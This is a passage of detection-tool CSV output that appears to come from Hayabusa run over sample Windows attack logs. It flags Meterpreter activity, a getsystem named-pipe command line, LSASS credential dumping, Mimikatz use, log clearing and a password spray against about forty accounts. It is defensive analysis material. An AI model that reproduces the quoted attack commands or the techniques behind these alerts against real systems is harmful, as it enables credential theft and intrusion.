Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx -2019-04-30 16:46:15.215 +09:00,IEWIN7,1,informational,Process Creation,Command: cmd.exe /c echo msdhch > \\.\pipe\msdhch : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx -2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx -2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,Meterpreter or Cobalt Strike Getsystem Service Start,,rules/sigma/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx -2019-05-01 03:08:22.618 +09:00,Sec504Student,1102,high,Security log was cleared,User: Sec504,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,Unknown process used a high privilege,Process: C:\Tools\mimikatz\mimikatz.exe : User: Sec504 : LogonID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx -2019-05-01 04:27:00.297 +09:00,DESKTOP-JR78RLP,1102,high,Security log was cleared,User: jwrig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:02.847 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:02.847 +09:00,-,-,medium,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:41 TargetUserName:thessman/edygert/rbowes/jwright/celgee/ebooth/cmoody/tbennett/melliott/jlake/cfleener/psmith/drook/dpendolino/Administrator/wstrzelec/mdouglas/cspizor/cragoso/bhostetler/jleytevidal/sarmstrong/baker/gsalinas/lschifano/cdavis/jorchilles/bking/ssims/zmathis/econrad/smisenar/eskoudis/mtoussain/dmashburn/kperryman/jkulikowski/bgreenwood/lpesce/sanson/bgalbraith IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_BruteForce_PasswordSprayDetect.yml,- -2019-05-01 04:27:03.925 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:05.020 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:06.085 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:07.171 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:08.254 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:09.323 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:10.377 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:11.465 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:12.549 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:13.611 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:14.687 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:15.750 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:16.841 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:17.922 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:19.035 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:20.097 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:21.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:22.222 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:23.295 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:24.342 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:25.404 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:26.504 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:27.583 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:28.654 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:29.712 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:30.787 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:31.861 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:32.955 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:34.020 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:35.081 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:36.151 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:37.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:38.310 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:39.393 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:40.457 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 